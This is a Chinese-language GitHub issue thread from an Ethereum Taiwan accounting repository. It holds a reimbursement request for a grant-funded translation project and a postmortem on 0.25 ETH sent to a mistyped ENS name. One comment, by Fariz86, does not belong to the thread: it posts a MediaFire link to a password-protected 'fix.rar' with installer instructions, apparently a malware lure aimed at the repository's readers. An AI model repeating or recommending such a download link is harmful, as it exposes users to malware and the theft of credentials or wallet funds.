### ISSUE TITLE
[請款]: TEM Grant - 翻譯計畫的前三個月支出

### ISSUE THREAD

**Issue by NIC619** [EtherTW/accounting#12]
### 暱稱

Nic

### 類型

預算

### 帳務處理人是否認識你

- [X] 帳務處理人可以從暱稱知道如何聯絡我

### 代幣種類

ETH

### 金額

600 USD

### Ethereum 主網帳號地址或 ENS

pinhaoc.eth

### 請款項目

| 項目         | 用途說明                     | 金額 (TWD) |
| ------------ | ---------------------------- | ---------- |
| TEM Grant - 翻譯計畫 | 第一至第三個月支出 | 200 USD * 3    |
|              |                              |            |
| **總計**     |                              | 600 USD    |

### 附件或其他補充資訊

翻譯計畫 Grant 頁面：https://hackmd.io/@liangcc/r1tKbIJXC

**Comment by Fariz86** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yurenju** [comment]
我這邊要補充一件事情。剛剛轉帳的時候，將原本要轉到 `pinhaoc.eth`，錯誤的轉到了 `pinhao.eth` 帳號，中間少了一個 c。

### 經過
首先利用 https://pinhaoc.eth.xyz 確定地址是 0x89735a54c7e90a40d3337c0c5861914a51cf026a

<img width="925" alt="image" src="https://github.com/user-attachments/assets/49eec540-53d9-4131-bba7-8daef1bbac22">



後來去看 https://hackmd.io/@liangcc/r1tKbIJXC 時，因為看到裡面出現 PinHao （沒有 C），下意識的又複製到網址列，並且加上 .eth.xyz： https://pinhao.eth.xyz

<img width="760" alt="image" src="https://github.com/user-attachments/assets/df725e78-ee5f-4991-a8b7-307b9a511674">


這個時候我以為剛剛 gnosis safe 的錢包解析 ENS 的時候弄錯了什麼，因為地址是不一樣的。但是這個時候就已經是錯誤地址了。我一直到請 @changwu-tw 幫忙簽名的時候才發現問題，不過已經來不及了。

### 下次改善方式
下次我應該是跟下一棒要簽名的人，直接給他 github issue，讓他可以直接再對一次地址是否正確。這次我因為直接貼給 changwu ENS 名稱，但是這個時候就已經錯了，所以他當然也沒辦法察覺到問題。

但是如果直接給他 github issue url，他就有機會可以從這邊察覺到我之前貼錯地址的事情。

### 損失
這次損失了 0.25 ETH，轉到不明的帳號 pinhao.eth 那邊去。還好損失並不算大，依照現在的價格來說是約 600 USD，不過我們當初的取得成本是約 1 ETH ~= 177 USD，所以以成本計算的話大概是 45 USD 左右。

總之我下次會小心的。
